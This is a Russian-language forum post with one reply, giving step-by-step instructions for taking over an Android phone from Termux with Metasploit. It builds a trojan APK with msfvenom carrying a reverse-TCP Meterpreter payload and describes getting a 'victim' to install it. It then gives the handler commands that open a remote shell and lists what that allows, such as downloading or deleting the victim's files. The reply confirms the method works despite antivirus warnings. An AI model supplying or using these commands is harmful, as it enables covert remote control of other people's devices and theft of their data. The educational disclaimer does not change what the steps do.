Взлом Android-устройства со смартфона. Полный доступ

[G-WolF]

Данная статья предоставляется лишь для ознакомления. Она не является побуждением к действиям, которые проделывает автор. Создано лишь в образовательных и развлекательных целях. Помните, что несанкционированный взлом чужих устройств является противоправным действием и карается по закону. Автор проделывает все действия лишь на собственном оборудовании и в собственной сети.
Автор лишь хочет донести до читателей, что нужно быть внимательным и осторожным при установке различного ПО.

Нам понадобится смартфон или планшет с установленной программой "Termux". Также в Termux уже должен быть установлен "Metasploit".


pkg update

Далее нужно перейти по следующему пути, введя команду


/data/data/com.termux/files/usr/opt/metasploit-framework

Введя команду ls вы должны увидеть примерно это:

Теперь создаем файл который будем кидать жертве, командой

msfvenom -p android/meterpreter/reverse_tcp LHOST=(наш IP) LPORT=4444 R> /sdcard/payload.apk
Мы создали файл, который хранится в пути /sdcard/payload.apk

Теперь нужно скинуть его жертве и жертва должна установить этот apk файл на своё устройство. Допустим жертва установила apk на своё устройство. Мы же запускаем metasploit и поочередно вводим каждую команду

use exploit/milti/handler

set payload android/meterpreter/reverse_tcp

set LHOST (наш тот же IP)

set LPORT 4444

exploit

Если всё прошло успешно, вы получите полный доступ к устройству жертвы. Введя команду help можно будет посмотреть список доступных команд. Вкратце расскажу, что можно будет сделать:

• Скачивать, удалять файлы жертвы
• Скидывать в его устройство свои файлы
• Посмотреть полную информацию о его устройстве
• Контролировать процессы устройства

 

[dvin]

получилось, апк создался, но на теле жертвы гуглмаркет защита запела сразу о шпионе и висит он в запущеных и очистка озу гасит его сразу. но сама схема пашет)))